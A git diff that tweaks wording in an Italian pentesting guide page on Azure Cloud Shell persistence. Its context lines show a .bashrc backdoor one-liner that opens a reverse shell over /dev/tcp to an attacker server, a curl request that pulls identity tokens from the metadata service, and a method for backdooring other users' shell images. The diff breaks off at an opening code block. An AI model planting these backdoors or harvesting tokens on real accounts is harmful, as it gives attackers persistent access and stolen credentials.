diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md index 604f838b2..dbdbb1194 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md +++ b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md @@ -7,13 +7,13 @@ Azure Cloud Shell offre accesso da riga di comando per gestire le risorse Azure con storage persistente e autenticazione automatica. Gli attaccanti possono sfruttare questo posizionando backdoor nella directory home persistente: * **Storage Persistente**: La directory home di Azure Cloud Shell è montata su una condivisione file Azure e rimane intatta anche dopo la fine della sessione. -* **Script di Avvio**: File come `.bashrc` o `config/PowerShell/Microsoft.PowerShell_profile.ps1` vengono eseguiti automaticamente all'inizio di ogni sessione, consentendo un'esecuzione persistente quando si avvia il cloud shell. +* **Script di Avvio**: File come `.bashrc` o `config/PowerShell/Microsoft.PowerShell_profile.ps1` vengono eseguiti automaticamente all'inizio di ogni sessione, consentendo un'esecuzione persistente quando il cloud shell si avvia. Esempio di backdoor in .bashrc: ```bash echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc ``` -Questo backdoor può eseguire comandi anche 5 minuti dopo che la shell cloud è stata chiusa dall'utente. +Questo backdoor può eseguire comandi anche 5 minuti dopo che la shell cloud è stata terminata dall'utente. Inoltre, interroga il servizio di metadati di Azure per dettagli sull'istanza e token: ```bash @@ -21,7 +21,7 @@ curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?a ``` ### Cloud Shell Phishing -Se un attaccante trova le immagini di altri utenti in un Storage Account a cui ha accesso in scrittura e lettura, sarà in grado di scaricare l'immagine, **aggiungere un backdoor bash e PS in essa**, e caricarla di nuovo nel Storage Account in modo che la prossima volta che l'utente accede alla shell, i **comandi verranno eseguiti automaticamente**. +Se un attaccante trova le immagini di altri utenti in un Storage Account a cui ha accesso in scrittura e lettura, sarà in grado di scaricare l'immagine, **aggiungere un backdoor bash e PS in essa**, e caricarla nuovamente nel Storage Account in modo che la prossima volta che l'utente accede alla shell, i **comandi verranno eseguiti automaticamente**. - **Scarica, backdoor e carica l'immagine:** ```bash